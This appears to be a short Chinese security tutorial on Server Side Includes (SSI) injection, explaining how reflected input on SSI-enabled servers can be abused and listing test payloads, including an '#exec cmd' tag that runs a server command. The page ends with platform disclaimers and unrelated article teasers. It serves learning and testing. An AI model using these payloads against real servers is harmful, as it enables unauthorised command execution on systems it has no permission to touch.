ssi注入

原文鏈接:http://wyb0.com/posts/ssi-injection/

0x00 SSI

SSI (Server Side Includes)是HTML頁面中的指令,在頁面被提供時由服務(wù)器進(jìn)行運(yùn)算,以對現(xiàn)有HTML頁面增加動態(tài)生成的內(nèi)容,而無須通過CGI程序提供其整個頁面,或者使用其他動態(tài)技術(shù)。

在很多場景中,用戶輸入的內(nèi)容可以顯示在頁面中,一個存在反射XSS漏洞的頁面,如果輸入的payload不是xss代碼而是ssi的標(biāo)簽,服務(wù)器又開啟了ssi支持的話就會存在SSI漏洞

若注入點(diǎn)在url中則可能需要進(jìn)行url編碼

0x01 payload

"-->'-->`--><!--#set var="a" value="123"--><!--#set var="b" value="654"--><!--#echo var="a"--><!--#echo var="b"-->

<!--#echo var="DATE_LOCAL" -->

<!--#exec cmd="dir" -->

0x02 示例

  • Referer被輸出到了頁面中


    圖片.png

  • url中的數(shù)據(jù)被輸出到頁面中(有時候url中的payload需要url編碼)


    圖片.png
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • 之前積累了XSS 有一段時間,因為目前開始了一件有趣的工程,需要整合非常多的知識,其中Web 安全這一塊出現(xiàn)最多的...
    刀背藏身閱讀 9,561評論 0 16
  • Spring Cloud為開發(fā)人員提供了快速構(gòu)建分布式系統(tǒng)中一些常見模式的工具(例如配置管理,服務(wù)發(fā)現(xiàn),斷路器,智...
    卡卡羅2017閱讀 136,562評論 19 139
  • http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 當(dāng)給sq...
    xuningbo閱讀 10,562評論 2 22
  • “呼,呼,呼……可惡,早知道這樣,還不如被執(zhí)行死刑呢!”黑若站在一個被毀的城堡前,喘著氣?!皻У暨@個……就結(jié)束了吧...
    絕望少年閱讀 504評論 0 1
  • 不知道是不是我多慮了,還是間隔太久了,突然感覺其實(shí)我們并沒有想想象中的那么深刻,發(fā)現(xiàn)我們之間的話變少了,心里總是瞞...
    阿立立哥閱讀 131評論 0 0

友情鏈接更多精彩內(nèi)容